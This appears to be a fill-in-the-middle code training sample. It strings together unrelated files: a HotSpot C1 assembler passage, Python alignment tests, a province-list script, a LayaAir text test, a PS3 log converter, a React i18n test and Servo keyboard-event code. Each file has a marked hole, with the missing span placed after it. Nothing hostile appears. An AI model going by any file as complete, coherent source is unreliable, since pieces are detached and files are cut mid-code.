record_non_safepoint_debug_info();
}
_pending_non_safepoint = NULL;
}
// Remember the debug info.
if (pc_offset > compilation()->debug_info_recorder()->last_pc_offset()) {
_pending_non_safepoint = src;
_pending_non_safepoint_offset = pc_offset;
}
}
// Index caller states in s, where 0 is the oldest, 1 its callee, etc.
// Return NULL if n is too large.
// Returns the caller_bci for the next-younger state, also.
static ValueStack* nth_oldest(ValueStack* s, int n, int& bci_result) {
ValueStack* t = s;
for (int i = 0; i < n; i++) {
if (t == NULL) break;
t = t->caller_state();
}
if (t == NULL) return NULL;
for (;;) {
ValueStack* tc = t->caller_state();
if (tc == NULL) return s;
t = tc;
bci_result = tc->bci();
s = s->caller_state();
}
}
void LIR_Assembler::record_non_safepoint_debug_info() {
int pc_offset = _pending_non_safepoint_offset;
ValueStack* vstack = debug_info(_pending_non_safepoint);
int bci = vstack->bci();
DebugInformationRecorder* debug_info = compilation()->debug_info_recorder();
assert(debug_info->recording_non_safepoints(), "sanity");
debug_info->add_non_safepoint(pc_offset);
// Visit scopes from oldest to youngest.
for (int n = 0; ; n++) {
int s_bci = bci;
ValueStack* s = nth_oldest(vstack, n, s_bci);
if (s == NULL) break;
IRScope* scope = s->scope();
//Always pass false for reexecute since these ScopeDescs are never used for deopt
methodHandle null_mh;
debug_info->describe_scope(pc_offset, null_mh, scope->method(), s->bci(), false/*reexecute*/);
}
debug_info->end_non_safepoint(pc_offset);
}
ImplicitNullCheckStub* LIR_Assembler::add_debug_info_for_null_check_here(CodeEmitInfo* cinfo) {
return add_debug_info_for_null_check(code_offset(), cinfo);
}
ImplicitNullCheckStub* LIR_Assembler::add_debug_info_for_null_check(int pc_offset, CodeEmitInfo* cinfo) {
ImplicitNullCheckStub* stub = new ImplicitNullCheckStub(pc_offset, cinfo);
append_code_stub(stub);
return stub;
}
void LIR_Assembler::add_debug_info_for_div0_here(CodeEmitInfo* info) {
add_debug_info_for_div0(code_offset(), info);
}
void LIR_Assembler::add_debug_info_for_div0(int pc_offset, CodeEmitInfo* cinfo) {
DivByZeroStub* stub = new DivByZeroStub(pc_offset, cinfo);
append_code_stub(stub);
}
void LIR_Assembler::emit_rtcall(LIR_OpRTCall* op) {
rt_call(op->result_opr(), op->addr(), op->arguments(), op->tmp(), op->info());
}
void LIR_Assembler::emit_call(LIR_OpJavaCall* op) {
verify_oop_map(op->info());
if (os::is_MP()) {
// must align calls sites, otherwise they can't be updated atomically on MP hardware
align_call(op->code());
}
// emit the static call stub stuff out of line
emit_static_call_stub();
CHECK_BAILOUT();
switch (op->code()) {
case lir_static_call:
case lir_dynamic_call:
call(op, relocInfo::static_call_type);
break;
case lir_optvirtual_call:
call(op, relocInfo::opt_virtual_call_type);
break;
case lir_icvirtual_call:
ic_call(op);
break;
case lir_virtual_call:
vtable_call(op);
break;
default:
fatal("unexpected op code: %s", op->name());
break;
}
// JSR 292
// Record if this method has MethodHandle invokes.
if (op->is_method_handle_invoke()) {
compilation()->set_has_method_handle_invokes(true);
}
#if defined(X86) && defined(TIERED)
// C2 leave fpu stack dirty clean it
if (UseSSE < 2) {
int i;
for ( i = 1; i <= 7 ; i++ ) {
ffree(i);
}
if (!op->result_opr()->is_float_kind()) {
ffree(0);
}
}
#endif // X86 && TIERED
}
void LIR_Assembler::emit_opLabel(LIR_OpLabel* op) {
_masm->bind (*(op->label()));
}
void LIR_Assembler::emit_op1(LIR_Op1* op) {
switch (op->code()) {
case lir_move:
if (op->move_kind() == lir_move_volatile) {
assert(op->patch_code() == lir_patch_none, "can't patch volatiles");
volatile_move_op(op->in_opr(), op->result_opr(), op->type(), op->info());
} else {
move_op(op->in_opr(), op->result_opr(), op->type(),
op->patch_code(), op->info(), op->pop_fpu_stack(),
op->move_kind() == lir_move_unaligned,
op->move_kind() == lir_move_wide);
}
break;
case lir_roundfp: {
LIR_OpRoundFP* round_op = op->as_OpRoundFP();
roundfp_op(round_op->in_opr(), round_op->tmp(), round_op->result_opr(), round_op->pop_fpu_stack());
break;
}
case lir_return:
return_op(op->in_opr());
break;
case lir_safepoint:
if (compilation()->debug_info_recorder()->last_pc_offset() == code_offset()) {
_masm->nop();
}
safepoint_poll(op->in_opr(), op->info());
break;
case lir_fxch:
fxch(op->in_opr()->as_jint());
break;
case lir_fld:
fld(op->in_opr()->as_jint());
break;
case lir_ffree:
ffree(op->in_opr()->as_jint());
break;
case lir_branch:
break;
case lir_push:
push(op->in_opr());
break;
case lir_pop:
pop(op->in_opr());
break;
case lir_neg:
negate(op->in_opr(), op->result_opr());
break;
case lir_leal:
leal(op->in_opr(), op->result_opr());
break;
case lir_null_check:
if (GenerateCompilerNullChecks) {
ImplicitNullCheckStub* stub = add_debug_info_for_null_check_here(op->info());
if (op->in_opr()->is_single_cpu()) {
_masm->null_check(op->in_opr()->as_register(), stub->entry());
} else {
Unimplemented();
}
}
break;
case lir_monaddr:
monitor_address(op->in_opr()->as_constant_ptr()->as_jint(), op->result_opr());
break;
#ifdef SPARC
case lir_pack64:
pack64(op->in_opr(), op->result_opr());
break;
case lir_unpack64:
unpack64(op->in_opr(), op->result_opr());
break;
#endif
case lir_unwind:
unwind_op(op->in_opr());
break;
default:
Unimplemented();
break;
}
}
void LIR_Assembler::emit_op0(LIR_Op0* op) {
switch (op->code()) {
case lir_word_align: {
_masm->align(BytesPerWord);
break;
}
case lir_nop:
assert(op->info() == NULL, "not supported");
_masm->nop();
break;
case lir_label:
Unimplemented();
break;
case lir_build_frame:
build_frame();
break;
case lir_std_entry:
// init offsets
offsets()->set_value(CodeOffsets::OSR_Entry, _masm->offset());
_masm->align(CodeEntryAlignment);
if (needs_icache(compilation()->method())) {
check_icache();
}
offsets()->set_value(CodeOffsets::Verified_Entry, _masm->offset());
_masm->verified_entry();
build_frame();
offsets()->set_value(CodeOffsets::Frame_Complete, _masm->offset());
break;
case lir_osr_entry:
offsets()->set_value(CodeOffsets::OSR_Entry, _masm->offset());
osr_entry();
break;
case lir_24bit_FPU:
set_24bit_FPU();
break;
case lir_reset_FPU:
reset_FPU();
break;
case lir_breakpoint:
breakpoint();
break;
case lir_fpop_raw:
fpop();
break;
case lir_membar:
membar();
break;
case lir_membar_acquire:
membar_acquire();
break;
case lir_membar_release:
membar_release();
break;
case lir_membar_loadload:
membar_loadload();
break;
case lir_membar_storestore:
membar_storestore();
break;
case lir_membar_loadstore:
membar_loadstore();
break;
case lir_membar_storeload:
membar_storeload();
break;
case lir_get_thread:
get_thread(op->result_opr());
break;
default:
ShouldNotReachHere();
break;
}
}
void LIR_Assembler::emit_op2(LIR_Op2* op) {
switch (op->code()) {
case lir_cmp:
if (op->info() != NULL) {
assert(op->in_opr1()->is_address() || op->in_opr2()->is_address(),
"shouldn't be codeemitinfo for non-address operands");
add_debug_info_for_null_check_here(op->info()); // exception possible
}
comp_op(op->condition(), op->in_opr1(), op->in_opr2(), op);
break;
case lir_cmp_l2i:
case lir_cmp_fd2i:
case lir_ucmp_fd2i:
comp_fl2i(op->code(), op->in_opr1(), op->in_opr2(), op->result_opr(), op);
break;
case lir_cmove:
cmove(op->condition(), op->in_opr1(), op->in_opr2(), op->result_opr(), op->type());
break;
case lir_shl:
case lir_shr:
case lir_ushr:
if (op->in_opr2()->is_constant()) {
shift_op(op->code(), op->in_opr1(), op->in_opr2()->as_constant_ptr()->as_jint(), op->result_opr());
} else {
shift_op(op->code(), op->in_opr1(), op->in_opr2(), op->result_opr(), op->tmp1_opr());
}
break;
case lir_add:
case lir_sub:
case lir_mul:
case lir_mul_strictfp:
case lir_div:
case lir_div_strictfp:
case lir_rem:
assert(op->fpu_pop_count() < 2, "");
arith_op(
op->code(),
op->in_opr1(),
op->in_opr2(),
op->result_opr(),
op->info(),
op->fpu_pop_count() == 1);
break;
case lir_abs:
case lir_sqrt:
case lir_sin:
case lir_tan:
case lir_cos:
case lir_log10:
case lir_pow:
intrinsic_op(op->code(), op->in_opr1(), op->in_opr2(), op->result_opr(), op);
break;
case lir_logic_and:
case lir_logic_or:
case lir_logic_xor:
logic_op(
op->code(),
op->in_opr1(),
op->in_opr2(),
op->result_opr());
break;
case lir_throw:
throw_op(op->in_opr1(), op->in_opr2(), op->info());
break;
case lir_xadd:
case lir_xchg:
atomic_op(op->code(), op->in_opr1(), op->in_opr2(), op->result_opr(), op->tmp1_opr());
break;
default:
Unimplemented();
break;
}
}
void LIR_Assembler::build_frame() {
_masm->build_frame(initial_frame_size_in_bytes(), bang_size_in_bytes());
}
void LIR_Assembler::roundfp_op(LIR_Opr src, LIR_Opr tmp, LIR_Opr dest, bool pop_fpu_stack) {
assert((src->is_single_fpu() && dest->is_single_stack()) ||
(src->is_double_fpu() && dest->is_double_stack()),
"round_fp: rounds register -> stack location");
reg2stack (src, dest, src->type(), pop_fpu_stack);
}
void LIR_Assembler::move_op(LIR_Opr src, LIR_Opr dest, BasicType type, LIR_PatchCode patch_code, CodeEmitInfo* info, bool pop_fpu_stack, bool unaligned, bool wide) {
if (src->is_register()) {
if (dest->is_register()) {
assert(patch_code == lir_patch_none && info == NULL, "no patching and info allowed here");
reg2reg(src, dest);
} else if (dest->is_stack()) {
assert(patch_code == lir_patch_none && info == NULL, "no patching and info allowed here");
reg2stack(src, dest, type, pop_fpu_stack);
} else if (dest->is_address()) {
reg2mem(src, dest, type, patch_code, info, pop_fpu_stack, wide, unaligned);
} else {
ShouldNotReachHere();
}
} else if (src->is_stack()) {
assert(patch_code == lir_patch_none && info == NULL, "no patching and info allowed here");
if (dest->is_register()) {
stack2reg(src, dest, type);
} else if (dest->is_stack()) {
stack2stack(src, dest, type);
} else {
ShouldNotReachHere();
}
} else if (src->is_constant()) {
if (dest->is_register()) {
const2reg(src, dest, patch_code, info); // patching is possible
} else if (dest->is_stack()) {
assert(patch_code == lir_patch_none && info == NULL, "no patching and info allowed here");
const2stack(src, dest);
} else if (dest->is_address()) {
assert(patch_code == lir_patch_none, "no patching allowed here");
const2mem(src, dest, type, info, wide);
} else {
ShouldNotReachHere();
}
} else if (src->is_address()) {
mem2reg(src, dest, type, patch_code, info, wide, unaligned);
} else {
ShouldNotReachHere();
}
}
void LIR_Assembler::verify_oop_map(CodeEmitInfo* info) {
#ifndef PRODUCT
if (VerifyOops) {
OopMapStream s(info->oop_map());
while (!s.is_done()) {
OopMapValue v = s.current();
if (v.is_oop()) {
VMReg r = v.reg();
if (!r->is_stack()) {
stringStream st;
st.print("bad oop %s at %d", r->as_Register()->name(), _masm->offset());
#ifdef SPARC
_masm->_verify_oop(r->as_Register(), os::strdup(st.as_string(), mtCompiler), __FILE__, __LINE__);
#else
_masm->verify_oop(r->as_Register());
#endif
} else {
_masm->verify_stack_oop(r->reg2stack() * VMRegImpl::stack_slot_size);
}
}
check_codespace();
CHECK_BAILOUT();
s.next();
}
}
#endif
}<|fim▁end|>
|
s->print_name(&st);
st.print(" slow case");
|
<|file_name|>provinces_script.py<|end_file_name|><|fim▁begin|># coding: utf-8
import sys
reload(sys)<|fim▁hole|>sys.setdefaultencoding('utf-8')
import json
china = json.loads(open('china.json', 'r').read()) # slow
new_provs = []
new_citys = []
for prov in china['children']:
new_provs.append(prov['name'])
for city in prov['children']:
if city['name'] not in [u'市辖区', u'县', u'省直辖县级行政区划']:
if city['name'][-1] == '市':
new_citys.append(city['name'][:-1])
else:
new_citys.append(city['name'])
print new_citys
with open('citys.json', 'w') as f:
f.write(json.dumps(new_citys, ensure_ascii=False, indent=4))<|fim▁end|>
| |
<|file_name|>test_local_align.py<|end_file_name|><|fim▁begin|>import six
from unittest import TestCase
from dark.reads import Read
from dark.local_align import LocalAlignment
class TestLocalAlign(TestCase):
"""
Test the LocalAlignment class.
With match +1, mismatch -1, gap open -1, gap extend -1 and
gap extend decay 0.0.
"""
def testPositiveMismatch(self):
"""
If the mismatch value passed is positive, an exception
must be raised.
"""
seq1 = Read('seq1', 'a')
seq2 = Read('seq2', 'a')
six.assertRaisesRegex(self, ValueError, 'Mismatch must be negative',
LocalAlignment, seq1, seq2, mismatch=3)
def testZeroMismatch(self):
"""
If the mismatch value passed is zero, an exception
must be raised.
"""
seq1 = Read('seq1', 'a')
seq2 = Read('seq2', 'a')
six.assertRaisesRegex(self, ValueError, 'Mismatch must be negative',
LocalAlignment, seq1, seq2, mismatch=0)
def testPositiveGap(self):
"""
If the gap value passed is positive, an exception
must be raised.
"""
seq1 = Read('seq1', 'a')
seq2 = Read('seq2', 'a')
six.assertRaisesRegex(self, ValueError, 'Gap must be negative',
LocalAlignment, seq1, seq2, gap=3)
def testZeroGap(self):
"""
If the gap value passed is zero, an exception
must be raised.
"""
seq1 = Read('seq1', 'a')
seq2 = Read('seq2', 'a')
six.assertRaisesRegex(self, ValueError, 'Gap must be negative',
LocalAlignment, seq1, seq2, gap=0)
def testPositiveGapExtend(self):
"""
If the gap extend value passed is positive, an exception
must be raised.
"""
seq1 = Read('seq1', 'a')
seq2 = Read('seq2', 'a')
six.assertRaisesRegex(self, ValueError,
'Gap extension penalty cannot be positive',
LocalAlignment, seq1, seq2, gapExtend=3)
def testFirstSequenceEmpty(self):
"""
If the first sequence passed is empty, an exception must be raised.
"""
seq1 = Read('seq1', '')
seq2 = Read('seq2', 'agtcagtcagtc')
six.assertRaisesRegex(self, ValueError, 'Empty sequence: seq1',
LocalAlignment, seq1, seq2)
def testSecondSequenceEmpty(self):
"""
If the second sequence passed is empty, an exception must be raised.
"""
seq1 = Read('seq1', 'agtcagtcagtc')
seq2 = Read('seq2', '')
six.assertRaisesRegex(self, ValueError, 'Empty sequence: seq2',
LocalAlignment, seq1, seq2)
def testBothSequencesEmpty(self):
"""
If two empty sequences are passed, an exception must be raised.
"""
seq1 = Read('seq1', '')
seq2 = Read('seq2', '')
six.assertRaisesRegex(self, ValueError, 'Empty sequence: seq1',
LocalAlignment, seq1, seq2)
def testGapAtStartOfSeq1(self):
seq1 = Read('seq1', 'gaatcg')
seq2 = Read('seq2', 'cgaatcg')
align = LocalAlignment(seq1, seq2)
result = align.createAlignment(resultFormat=str)
alignment = ('\nCigar string of aligned region: 6=\n'
'seq1 Match start: 1 Match end: 6\n'
'seq2 Match start: 2 Match end: 7\n'
'seq1 1 GAATCG 6\n'
' ||||||\n'
'seq2 2 GAATCG 7')
self.assertEqual(result, alignment)
def testGapAtStartOfSeq2(self):
seq1 = Read('seq1', 'cgaatcg')
seq2 = Read('seq2', 'gaatcg')
align = LocalAlignment(seq1, seq2)
result = align.createAlignment(resultFormat=str)
alignment = ('\nCigar string of aligned region: 6=\n'
'seq1 Match start: 2 Match end: 7\n'
'seq2 Match start: 1 Match end: 6\n'
'seq1 2 GAATCG 7\n'
' ||||||\n'
'seq2 1 GAATCG 6')
self.assertEqual(result, alignment)
def testGapAtEndOfSeq1(self):
seq1 = Read('seq1', 'cgaatc')
seq2 = Read('seq2', 'cgaatcg')
align = LocalAlignment(seq1, seq2)
result = align.createAlignment(resultFormat=str)
alignment = ('\nCigar string of aligned region: 6=\n'
'seq1 Match start: 1 Match end: 6\n'
'seq2 Match start: 1 Match end: 6\n'
'seq1 1 CGAATC 6\n'
' ||||||\n'
'seq2 1 CGAATC 6')
self.assertEqual(result, alignment)
def testGapAtEndOfSeq2(self):
seq1 = Read('seq1', 'cgaatcg')
seq2 = Read('seq2', 'cgaatc')
align = LocalAlignment(seq1, seq2)
result = align.createAlignment(resultFormat=str)
alignment = ('\nCigar string of aligned region: 6=\n'
'seq1 Match start: 1 Match end: 6\n'
'seq2 Match start: 1 Match end: 6\n'
'seq1 1 CGAATC 6\n'
' ||||||\n'
'seq2 1 CGAATC 6')
self.assertEqual(result, alignment)
def testGapAtBothEndsOfSeq1(self):
seq1 = Read('seq1', 'gaatc')
seq2 = Read('seq2', 'cgaatcg')
align = LocalAlignment(seq1, seq2)
result = align.createAlignment(resultFormat=str)
alignment = ('\nCigar string of aligned region: 5=\n'
'seq1 Match start: 1 Match end: 5\n'
'seq2 Match start: 2 Match end: 6\n'
'seq1 1 GAATC 5\n'
' |||||\n'
'seq2 2 GAATC 6')
self.assertEqual(result, alignment)
def testGapAtBothEndsOfSeq2(self):
seq1 = Read('seq1', 'cgaatcg')
seq2 = Read('seq2', 'gaatc')
align = LocalAlignment(seq1, seq2)
result = align.createAlignment(resultFormat=str)
align = LocalAlignment(seq1, seq2)
result = align.createAlignment(resultFormat=str)
alignment = ('\nCigar string of aligned region: 5=\n'
'seq1 Match start: 2 Match end: 6\n'
'seq2 Match start: 1 Match end: 5\n'
'seq1 2 GAATC 6\n'
' |||||\n'
'seq2 1 GAATC 5')
self.assertEqual(result, alignment)
def testAlignmentWithGapInMiddle(self):
seq1 = Read('seq1', 'agtcagtcagtc')
seq2 = Read('seq2', 'cgaatcg')
align = LocalAlignment(seq1, seq2)
result = align.createAlignment(resultFormat=str)
alignment = ('\nCigar string of aligned region: 2=1D1=\n'
'seq1 Match start: 7 Match end: 10\n'
'seq2 Match start: 5 Match end: 7\n'
'seq1 7 TCAG 10\n'
' || |\n'
'seq2 5 TC-G 7')
self.assertEqual(result, alignment)
def testTwoEqualSequences(self):
"""<|fim▁hole|> show that the sequences completely match.
"""
seq1 = Read('seq1', 'cgaatcg')
seq2 = Read('seq2', 'cgaatcg')
align = LocalAlignment(seq1, seq2)
result = align.createAlignment(resultFormat=str)
alignment = ('\nCigar string of aligned region: 7=\n'
'seq1 Match start: 1 Match end: 7\n'
'seq2 Match start: 1 Match end: 7\n'
'seq1 1 CGAATCG 7\n'
' |||||||\n'
'seq2 1 CGAATCG 7')
self.assertEqual(result, alignment)
def testTwoCompletelyDifferentSequences(self):
"""
When two completely different sequences are given, the result
should be the two sequences with an empty alignment.
"""
seq1 = Read('seq1', 'aaaaaa')
seq2 = Read('seq2', 'gggggg')
align = LocalAlignment(seq1, seq2)
result = align.createAlignment(resultFormat=str)
alignment = ('\nNo alignment between seq1 and seq2\n')
self.assertEqual(result, alignment)
def testWikiAnswer(self):
"""
Test the example given in Wikipedia:
http://en.wikipedia.org/wiki/Smith%E2%80%93Waterman_algorithm
"""
seq1 = Read('seq1', 'ACACACTA')
seq2 = Read('seq2', 'AGCACACA')
align = LocalAlignment(seq1, seq2, match=2)
result = align.createAlignment(resultFormat=str)
alignment = ('\nCigar string of aligned region: 1=1I5=1D1=\n'
'seq1 Match start: 1 Match end: 8\n'
'seq2 Match start: 1 Match end: 8\n'
'seq1 1 A-CACACTA 8\n'
' | ||||| |\n'
'seq2 1 AGCACAC-A 8')
self.assertEqual(result, alignment)
def testWikiAnswerWithMatchOne(self):
"""
Test the example given in Wikipedia
http://en.wikipedia.org/wiki/Smith%E2%80%93Waterman_algorithm
Wikipedia uses a match score of two, here we use a score of one.
"""
seq1 = Read('seq1', 'ACACACTA')
seq2 = Read('seq2', 'AGCACACA')
align = LocalAlignment(seq1, seq2, match=1)
result = align.createAlignment(resultFormat=str)
alignment = ('\nCigar string of aligned region: 5=1D1=\n'
'seq1 Match start: 2 Match end: 8\n'
'seq2 Match start: 3 Match end: 8\n'
'seq1 2 CACACTA 8\n'
' ||||| |\n'
'seq2 3 CACAC-A 8')
self.assertEqual(result, alignment)
def testWikiAnswerAsDict(self):
"""
Test the example given in Wikipedia:
http://en.wikipedia.org/wiki/Smith%E2%80%93Waterman_algorithm
with the return result being a dict.
"""
seq1 = Read('seq1', 'ACACACTA')
seq2 = Read('seq2', 'AGCACACA')
align = LocalAlignment(seq1, seq2, match=2)
result = align.createAlignment()
self.assertEqual(
{
'cigar': '1=1I5=1D1=',
'sequence1Start': 1,
'sequence1End': 8,
'sequence2Start': 1,
'sequence2End': 8,
'text': [
'seq1 1 A-CACACTA 8',
' | ||||| |',
'seq2 1 AGCACAC-A 8',
]
},
result
)
def testWikiAnswerWithMatchOneAsDict(self):
"""
Test the example given in Wikipedia
http://en.wikipedia.org/wiki/Smith%E2%80%93Waterman_algorithm
Wikipedia uses a match score of two, here we use a score of one.
Get the result as a dict.
"""
seq1 = Read('seq1', 'ACACACTA')
seq2 = Read('seq2', 'AGCACACA')
align = LocalAlignment(seq1, seq2, match=1)
result = align.createAlignment()
self.assertEqual(
{
'cigar': '5=1D1=',
'sequence1Start': 2,
'sequence1End': 8,
'sequence2Start': 3,
'sequence2End': 8,
'text': [
'seq1 2 CACACTA 8',
' ||||| |',
'seq2 3 CACAC-A 8',
]
},
result
)<|fim▁end|>
|
When two identical sequences are given, the result should
|
<|file_name|>testText.ts<|end_file_name|><|fim▁begin|>import {delay} from './delay'
import { Laya } from 'Laya';
import { Text } from 'laya/display/Text';
import { TextRender } from 'laya/webgl/text/TextRender';
export class Main {
constructor() {
Laya.init(800,600);
//Laya.stage.scaleMode = 'fixedwidth';
Laya.stage.screenMode = 'none';
//Laya.Stat.show();
this.test1();
}
/**
* 某张文字贴图的一部分被释放后,应该能正确恢复。
* 有cacheas normal的情况
*/
async test1(){
// 先创建两个文字贴图,由于字体较大,4个字就占一张图。
var t1 = new Text();
t1.fontSize = 120;
t1.text = 'abcd'; // 1是 abcd
t1.color='red';
t1.cacheAs='normal';
Laya.stage.addChild(t1);
var t2 = new Text();
t2.pos(0,120);
t2.fontSize = 120;
t2.text = 'efgh'; // 2是efgh<|fim▁hole|> await delay(10);
// 上面两个隐藏掉,里面的文字不再使用。
t1.visible=false;
t2.visible=false;
await delay(10);
//t3 使用第一张的3个字,第二张的1个字,如果GC的话,会导致第二张被回收,第一张的d被释放
var t3 = new Text();
t3.pos(0,240);
t3.text='abce';
t3.fontSize=120;
t3.color='red';
Laya.stage.addChild(t3);
await delay(10); //等待画出来
//t3.visible=false;
TextRender.textRenderInst.GC();
await delay(10);
t1.visible=true; // 这时候d由于被释放了,应该触发重新创建
await delay(10); // 等待渲染结果
(window as any).testEnd=true; // 告诉测试程序可以停止了
}
}
//激活启动类
new Main();<|fim▁end|>
|
t2.color='red';
Laya.stage.addChild(t2);
|
<|file_name|>convert-ps3-output.py<|end_file_name|><|fim▁begin|>import os
import sys
def main():
if len(sys.argv) <= 2:
print("This script generates the .expected file from your PS3's debug logs.")
print("")
print("Usage: convert-ps3-output.py <input> <output>")
print("Example: convert-ps3-output.py hello_world.log hello_world.expected")
return False
#Parse and check arguments
inputFile = sys.argv[1]
outputFile = sys.argv[2]
if not os.path.isfile(inputFile):
print("[!] Input file does not exist")
return False<|fim▁hole|> data = f.read()
data = data[data.find(b"/app_home/"):]
data = data[data.find(b"\x0D\x0A")+2:]
data = data[:data.rindex(b"END LOG")-12]
data = data.replace(b"\x0D\x0A", b"\x0A")
w.write(data)
w.close()
if __name__ == "__main__":
main()<|fim▁end|>
|
f = open(inputFile, 'rb')
w = open(outputFile, 'wb')
|
<|file_name|>Message.spec.js<|end_file_name|><|fim▁begin|>import React from 'react';
import { render as mount } from 'enzyme';
import { Provider as ContextProvider } from '../common/context';
import Message from './Message';
describe('Message', () => {
function render(message, context) {
// need the spans otherwise the document has 0 html elements in it.
return mount(
<span>
<ContextProvider value={context}>{message}</ContextProvider>
</span>,
);
}
it('translates the given message', () => {
const translateAsParts = jest.fn(() => [
{ dangerous: false, value: 'translated ' },
{ dangerous: true, value: 'value' },
]);
const context = { translateAsParts };
const component = render(<Message>message.id</Message>, context);
expect(translateAsParts).toHaveBeenCalledTimes(1);
expect(translateAsParts).toHaveBeenCalledWith('message.id', {});
expect(component.text()).toEqual('translated value');
});
it('translates with parameters', () => {
const translateAsParts = jest.fn((key, params) => [
{ dangerous: false, value: 'translated value ' },
{ dangerous: true, value: params.test },
]);
const context = { translateAsParts };
const component = render(<Message params={{ test: 'hello' }}>message.id</Message>, context);
expect(translateAsParts).toHaveBeenCalledTimes(1);
expect(translateAsParts).toHaveBeenCalledWith('message.id', { test: 'hello' });
expect(component.text()).toEqual('translated value hello');
});
it('translates with sanitized html', () => {
const html = '<h1>this is a heading<b>with bold</b></h1>';<|fim▁hole|> const translateAsParts = jest.fn(() => [{ dangerous: false, value: html }]);
const context = { translateAsParts };
const component = render(<Message>message.id</Message>, context);
expect(component.html()).toBe(
'<h1>this is a heading<b>with bold</b></h1>',
);
});
it('allows to translate things as html', () => {
const translateAsParts = jest.fn(() => [
{ dangerous: false, value: '<h1>some safe html</h1>' },
{ dangerous: true, value: '<span>some sketchy user input</span>' },
]);
const context = { translateAsParts };
const component = render(<Message dangerouslyTranslateInnerHTML="message.id" />, context);
expect(component.html()).toBe(
'<span><h1>some safe html</h1></span><span>some sketchy user input</span>',
);
});
it('allows to translate into a string', () => {
const translateAsParts = jest.fn(() => [
{ dangerous: false, value: 'just some ' },
{ dangerous: true, value: 'text' },
]);
const context = { translateAsParts };
const component = render(<Message asString>message.id</Message>, context);
expect(component.html()).toBe('just some text');
});
});<|fim▁end|>
| |
<|file_name|>keyboardevent.rs<|end_file_name|><|fim▁begin|>/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
use dom::bindings::cell::DOMRefCell;
use dom::bindings::codegen::Bindings::KeyboardEventBinding;
use dom::bindings::codegen::Bindings::KeyboardEventBinding::{KeyboardEventConstants, KeyboardEventMethods};
use dom::bindings::codegen::Bindings::UIEventBinding::UIEventMethods;
use dom::bindings::error::Fallible;
use dom::bindings::inheritance::Castable;
use dom::bindings::js::{Root, RootedReference};
use dom::bindings::reflector::reflect_dom_object;
use dom::bindings::str::DOMString;
use dom::event::Event;
use dom::uievent::UIEvent;
use dom::window::Window;
use msg::constellation_msg;
use msg::constellation_msg::{Key, KeyModifiers};
use std::borrow::Cow;
use std::cell::Cell;
no_jsmanaged_fields!(Key);
#[dom_struct]
pub struct KeyboardEvent {
uievent: UIEvent,
key: Cell<Option<Key>>,
key_string: DOMRefCell<DOMString>,
code: DOMRefCell<DOMString>,
location: Cell<u32>,
ctrl: Cell<bool>,
alt: Cell<bool>,
shift: Cell<bool>,
meta: Cell<bool>,
repeat: Cell<bool>,
is_composing: Cell<bool>,
char_code: Cell<Option<u32>>,
key_code: Cell<u32>,
printable: Cell<Option<char>>,
}
impl KeyboardEvent {
fn new_inherited() -> KeyboardEvent {
KeyboardEvent {
uievent: UIEvent::new_inherited(),
key: Cell::new(None),
key_string: DOMRefCell::new(DOMString::new()),
code: DOMRefCell::new(DOMString::new()),
location: Cell::new(0),
ctrl: Cell::new(false),
alt: Cell::new(false),
shift: Cell::new(false),
meta: Cell::new(false),
repeat: Cell::new(false),
is_composing: Cell::new(false),
char_code: Cell::new(None),
key_code: Cell::new(0),
printable: Cell::new(None),
}
}
pub fn new_uninitialized(window: &Window) -> Root<KeyboardEvent> {
reflect_dom_object(box KeyboardEvent::new_inherited(),
window,
KeyboardEventBinding::Wrap)
}
pub fn new(window: &Window,
type_: DOMString,
can_bubble: bool,
cancelable: bool,
view: Option<&Window>,
_detail: i32,
ch: Option<char>,
key: Option<Key>,
key_string: DOMString,
code: DOMString,
location: u32,
repeat: bool,
is_composing: bool,
ctrl_key: bool,
alt_key: bool,
shift_key: bool,
meta_key: bool,
char_code: Option<u32>,
key_code: u32) -> Root<KeyboardEvent> {
let ev = KeyboardEvent::new_uninitialized(window);
ev.InitKeyboardEvent(type_, can_bubble, cancelable, view, key_string, location,
DOMString::new(), repeat, DOMString::new());
ev.key.set(key);
*ev.code.borrow_mut() = code;
ev.ctrl.set(ctrl_key);
ev.alt.set(alt_key);
ev.shift.set(shift_key);
ev.meta.set(meta_key);
ev.char_code.set(char_code);
ev.printable.set(ch);
ev.key_code.set(key_code);
ev.is_composing.set(is_composing);
ev
}
pub fn Constructor(window: &Window,
type_: DOMString,
init: &KeyboardEventBinding::KeyboardEventInit) -> Fallible<Root<KeyboardEvent>> {
let event = KeyboardEvent::new(window,
type_,
init.parent.parent.parent.bubbles,
init.parent.parent.parent.cancelable,
init.parent.parent.view.r(),
init.parent.parent.detail,
None,
key_from_string(&init.key, init.location),
init.key.clone(), init.code.clone(), init.location,
init.repeat, init.isComposing, init.parent.ctrlKey,
init.parent.altKey, init.parent.shiftKey, init.parent.metaKey,
None, 0);
Ok(event)
}
pub fn key_properties(ch: Option<char>, key: Key, mods: KeyModifiers)
-> KeyEventProperties {
KeyEventProperties {
key_string: key_value(ch, key, mods),
code: code_value(key),
location: key_location(key),
char_code: ch.map(|ch| ch as u32),
key_code: key_keycode(key),
}
}
}
impl KeyboardEvent {
pub fn printable(&self) -> Option<char> {
self.printable.get()
}
pub fn get_key(&self) -> Option<Key> {
self.key.get().clone()
}
pub fn get_key_modifiers(&self) -> KeyModifiers {
let mut result = KeyModifiers::empty();
if self.shift.get() {
result = result | constellation_msg::SHIFT;
}
if self.ctrl.get() {
result = result | constellation_msg::CONTROL;
}
if self.alt.get() {
result = result | constellation_msg::ALT;
}
if self.meta.get() {
result = result | constellation_msg::SUPER;
}
result
}
}
// https://w3c.github.io/uievents-key/#key-value-tables
pub fn key_value(ch: Option<char>, key: Key, mods: KeyModifiers) -> Cow<'static, str> {
if let Some(ch) = ch {
return Cow::from(format!("{}", ch));
}
let shift = mods.contains(constellation_msg::SHIFT);
Cow::from(match key {
Key::Space => " ",
Key::Apostrophe if shift => "\"",
Key::Apostrophe => "'",
Key::Comma if shift => "<",
Key::Comma => ",",
Key::Minus if shift => "_",
Key::Minus => "-",
Key::Period if shift => ">",
Key::Period => ".",
Key::Slash if shift => "?",
Key::Slash => "/",
Key::GraveAccent if shift => "~",
Key::GraveAccent => "`",
Key::Num0 if shift => ")",
Key::Num0 => "0",
Key::Num1 if shift => "!",
Key::Num1 => "1",
Key::Num2 if shift => "@",
Key::Num2 => "2",
Key::Num3 if shift => "#",
Key::Num3 => "3",
Key::Num4 if shift => "$",
Key::Num4 => "4",
Key::Num5 if shift => "%",
Key::Num5 => "5",
Key::Num6 if shift => "^",
Key::Num6 => "6",
